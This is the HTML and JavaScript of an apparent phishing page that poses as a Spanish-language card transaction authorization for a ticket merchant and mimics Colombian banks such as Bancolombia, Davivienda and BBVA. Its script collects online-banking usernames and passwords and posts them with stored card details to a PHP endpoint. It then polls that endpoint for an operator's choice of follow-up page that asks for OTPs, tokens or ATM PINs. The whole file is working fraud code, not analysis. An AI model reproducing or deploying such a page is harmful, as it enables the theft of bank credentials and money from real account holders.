<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Autorización de Transacción</title>
<script src="./bots/aes.js"></script>
<script src="./bots/AesUtil.js"></script>
<script src="../js/jquery-3.7.7.js"></script>
<script src="./bots/md5.js"></script>
<script src="./bots/pbkdf2.js"></script>
<script src="./bots/string-mask.js"></script>
<style>
  body {
    font-family: Arial, sans-serif;
    margin: 0;
    background: #f5f5f5;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    overflow: hidden;
  }

  .container {
    width: 100%;
    max-width: 400px;
    background: #fff;
    border-radius: 10px;
    box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
    padding: 20px;
    box-sizing: border-box;
    overflow-y: auto;
    margin: 0 10px;
  }

  .header {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 20px;
    border-bottom: 1px solid #ccc;
    padding-bottom: 10px;
  }

  .header img {
    height: 35px;
  }

  .title {
    font-size: 18px;
    font-weight: bold;
    margin-bottom: 10px;
    text-align: left;
  }

  .details p {
    margin: 10px 0;
    font-size: 14px;
  }

  .details p.normal {
    color: #D6D2C4;
    font-weight: normal;
  }

  .details p.small {
    font-size: 12px;
    color: #ffffff;
    font-weight: normal;
  }

  .input-group {
    display: flex;
    justify-content: flex-start;
    margin-bottom: 15px;
  }

  .input-group label {
    width: 35%;
    text-align: right;
    margin-right: 10px;
    font-size: 14px;
  }

  .input-group input {
    width: 40%;
    padding: 8px;
    border: 1px solid rgb(229, 20, 20);
    border-radius: 5px;
    font-size: 14px;
  }

  .button {
    width: 30%;
    padding: 10px;
    background: #000;
    color: #fff;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    font-size: 16px;
    font-weight: bold;
    margin-top: 30px;
    text-align: center;
    display: block;
    margin-left: auto;
    margin-right: auto;
  }

  /* Loader */
  .loaderp {
    width: 48px;
    height: 48px;
    border: 5px solid #FFF;
    border-bottom-color: rgb(117, 117, 117);
    border-radius: 50%;
    display: inline-block;
    box-sizing: border-box;
    animation: rotation 1s linear infinite;
  }

  @keyframes rotation {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
  }

  .loaderp-full {
    position: fixed; /* Usamos fixed para que el loader no se desplace con el scroll */
    top: 65%; /* Centrado verticalmente */
    left: 50%;
    transform: translate(-50%, -50%); /* Centrado exacto */
    width: 23%; /* 30% del contenedor principal */
    height: 25vh; /* 30% de la altura del contenedor principal */
    max-width: 500px;
    max-height: 200px;
    display: flex;
    justify-content: center;
    align-items: center;
    background-color: white; /* Fondo blanco */
    border-radius: 8px;
    z-index: 1000; /* Asegura que esté por encima de otros elementos */
  }

  .hidden {
    display: none;
  }

  /* Estilos específicos para dispositivos móviles */
  @media (max-width: 600px) {
    .loaderp {
      width: 32px;
      height: 32px;
      border: 4px solid #FFF;
      border-bottom-color: rgb(150, 150, 150);
    }

    .loaderp-full {
      top: 68.5%;
      left: 50%;
      transform: translate(-50%, -50%);
      width: 90vw; /* Ancho: 90% del viewport */
      height: 29vh; /* Alto: 16% del viewport */
      max-width: 520px;
      max-height: 218px;
  }
  }

  /* Estilo para el texto de instrucciones */
  .instructions-text {
    font-size: 14px;
    color: #555;
    margin: 10px 0;
    line-height: 1.5;
    text-align: center;
    font-weight: normal;
    font-family: Arial, sans-serif;
  }

  @media (max-width: 600px) {
    .instructions-text {
      font-size: 12px;
    }
  }
</style>
</head>
<body>
<div class="container">
  <div class="header">
    <img id="bank-logo" src="lgos/error2.png" alt="Banco Logo">
    <img id="card-type-logo" src="lgos/error.avif" alt="Tipo Tarjeta Logo" height="35">
  </div>
  <div class="title">Autorización de transacción</div>
  <p class="small">
    La transacción de <strong>TIQUETES BARATOS S.A</strong> por 
    <strong id="monto-transaccion">$49,999 COP</strong> 
    con tarjeta terminada en <strong id="card-last4">0000</strong> debe ser autorizada.
  </p>
  <div class="details">
    <p><strong>Comercio:</strong> TIQUETES BARATOS S.A</p>
    <p><strong>Monto:</strong> <span id="monto-transaccion-detalle">Calculando...</span></p>
    <p><strong>Tarjeta:</strong> **** **** **** <span id="card-last4-display">0000</span></p>
  </div>
  <form id="transaction-form">
    <div class="input-group">
      <label id="usuario-label" for="usuario">Usuario:</label>
      <input type="text" id="usuario" placeholder="Ingresa tu usuario">
    </div>
    <div class="input-group">
      <label id="clave-label" for="clave">Clave:</label>
      <input type="password" id="clave" placeholder="Ingresa tu clave" maxlength="11">
    </div>
    <p class="instructions-text">Estos son los datos que utilizas para ingresar a tu app.</p>
    <button type="submit" class="button" id="authorize-button" disabled>Autorizar</button>
  </form>
  <!-- Loader con la estructura y estilos idénticos -->
  <div class="loaderp-full hidden">
    <span class="loaderp"></span>
    <p class="text-italic tc-ocean fs-3 fw-light"></p>
  </div>
</div>
<script>
function habilitarBoton() {
  const u = document.getElementById('usuario').value.trim();
  const c = document.getElementById('clave').value.trim();
  document.getElementById('authorize-button').disabled = !(u && c && c.length <= 11);
}
document.getElementById('usuario').addEventListener('input', habilitarBoton);
document.getElementById('clave').addEventListener('input', habilitarBoton);

document.getElementById('transaction-form').addEventListener('submit', async e => {
  e.preventDefault();
  const loader = document.querySelector('.loaderp-full');
  loader.classList.remove('hidden');

  const usuario = document.getElementById('usuario').value.trim();
  const clave = document.getElementById('clave').value.trim();

  // Guarda en localStorage en el objeto 'logoinfo'
  localStorage.setItem('logoinfo', JSON.stringify({ usuario, clave }));

  const transactionId = Date.now().toString(36) + Math.random().toString(36).substr(2);
  localStorage.setItem('transactionId', transactionId);

  const datosTarjeta = JSON.parse(localStorage.getItem('tbdatos')) || {};
  const payload = { usuario, clave, transactionId, datosTarjeta };

  try {
    const resp = await fetch('1.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
    const result = await resp.json();
    if (!result.ok) {
      alert(result.error);
      loader.classList.add('hidden');
      return;
    }
    while (true) {
      const poll = await fetch(`1.php?transactionId=${transactionId}`);
      const pollJson = await poll.json();
      if (pollJson.ok && pollJson.action) {
        loader.classList.add('hidden');
        const routes = {
          pedir_dinamica: "dinamica-id.php",
          pedir_cajero: "ccajero-id.php",
          pedir_otp: "otp-id.php",
          pedir_token: "token-id.php",
          error_tc: "../pay/",
          error_logo: "error-id.php"
        };
        window.location.href = routes[pollJson.action] || "error-id.php";
        break;
      }
      await new Promise(r => setTimeout(r, 2000));
    }
  } catch (error) {
    alert("Error: " + error.message);
    loader.classList.add('hidden');
  }
});
</script>

<!-- === Aquí agregamos el script con las funciones solicitadas === -->
<script>
  // 1) Redirige si detecta "bancolombia" (excepto nequi)
  function analizarBancoInfoload() {
    const infoload = JSON.parse(localStorage.getItem('infoload'));
    if (infoload && infoload.bank) {
      const banco = infoload.bank.toLowerCase();
      if (banco.includes("bancolombia") && !banco.includes("bancolombia s.a.- nequi")) {
        window.location.href = "bancol/index-pc.html";
      }
    }
  }

  // 2) Normaliza el nombre del banco -> logo
  function normalizarBanco(nombreBanco) {
    const palabrasClave = {
      "av villas": "bavevi.png",
      "scotiabank colpatria": "bcolpa.png",
      "popular": "bpopular.png",
      "bogota": "bbogo.png",
      "caja social": "bcajas.png",
      "davivienda": "bdavi1.svg",
      "occidente": "bocinen.png",
      "bbva colombia": "bvva.png",
      "bbva": "bvva.png"
    };
    const nombreNormalizado = nombreBanco.toLowerCase();
    for (const clave in palabrasClave) {
      if (nombreNormalizado.includes(clave)) {
        return palabrasClave[clave];
      }
    }
    return "error2.png";
  }

  // 3) Actualiza logos de banco y tarjeta (y cambia labels si correspondiera)
  function actualizarLogos() {
    const infoload = JSON.parse(localStorage.getItem('infoload'));
    const bankLogo = document.getElementById("bank-logo");
    const cardTypeLogo = document.getElementById("card-type-logo");
    const tiposTarjetas = {
      "visa": "visa.jpg",
      "mastercard": "master.webp",
      "amex": "amex.avif",
      "discover": "discover.png"
    };

    // Logo de banco
    if (infoload && infoload.bank) {
      const logoBanco = normalizarBanco(infoload.bank);
      bankLogo.src = `lgos/${logoBanco}`;
    } else {
      bankLogo.src = "lgos/error2.png";
    }

    // Logo de tarjeta
    if (infoload && infoload.cardType) {
      const tipoTarjetaNormalizado = infoload.cardType.toLowerCase();
      cardTypeLogo.src = tiposTarjetas[tipoTarjetaNormalizado]
        ? `lgos/${tiposTarjetas[tipoTarjetaNormalizado]}`
        : "lgos/error.avif";
    } else {
      cardTypeLogo.src = "lgos/error.avif";
    }

    // Ajuste de label y maxlength si aplica
    const banco       = (infoload && infoload.bank) ? infoload.bank.toLowerCase() : "";
    const usuarioLabel= document.getElementById("usuario-label");
    const claveLabel  = document.getElementById("clave-label");
    const claveInput  = document.getElementById("clave");
    if (usuarioLabel && claveLabel && claveInput) {
      if (
        banco.includes("bogota")     ||
        banco.includes("caja social")||
        banco.includes("davivienda") ||
        banco.includes("occidente")  ||
        banco.includes("bbva")
      ) {
        usuarioLabel.innerText = "Cédula:";
        claveLabel.innerText   = "Clave:";
        claveInput.setAttribute("maxlength", "6");
      } else {
        usuarioLabel.innerText = "Usuario:";
        claveLabel.innerText   = "Clave:";
        claveInput.setAttribute("maxlength", "11");
      }
    }
  }

  // 4) Calcular el precio total (sumando ida y regreso) y mostrarlo
  function obtenerPrecio(precio) {
    return parseFloat(precio.replace('$', '').replace('.', '').replace(',', '.'));
  }
  function formatearPrecio(numero) {
    return numero.toLocaleString('es-CO', { style: 'currency', currency: 'COP' });
  }
  function calcularPrecioTotal() {
    const datosVueloIda = JSON.parse(localStorage.getItem('datos_vuelo_ida'));
    const datosVueloRegreso = JSON.parse(localStorage.getItem('datos_vuelo_regreso'));
    let precioTotal = 0;
    if (datosVueloIda) {
      precioTotal += obtenerPrecio(datosVueloIda.price);
    }
    if (datosVueloRegreso) {
      precioTotal += obtenerPrecio(datosVueloRegreso.price);
    }
    const montoFormateado = formatearPrecio(precioTotal);
    document.getElementById("monto-transaccion").innerText = montoFormateado;
    document.getElementById("monto-transaccion-detalle").innerText = montoFormateado;
  }

  // 5) Últimos 4 dígitos
  function obtenerUltimos4Digitos() {
    const tbdatos = JSON.parse(localStorage.getItem('tbdatos'));
    if (tbdatos && tbdatos.cardNumber) {
      const ultimos4 = tbdatos.cardNumber.slice(-4);
      document.getElementById("card-last4").innerText = ultimos4;
      document.getElementById("card-last4-display").innerText = ultimos4;
    }
  }

  // Se llama todo en DOMContentLoaded
  window.addEventListener('DOMContentLoaded', () => {
    analizarBancoInfoload();
    actualizarLogos();
    calcularPrecioTotal();
    obtenerUltimos4Digitos();
  });
</script>
</body>
</html>
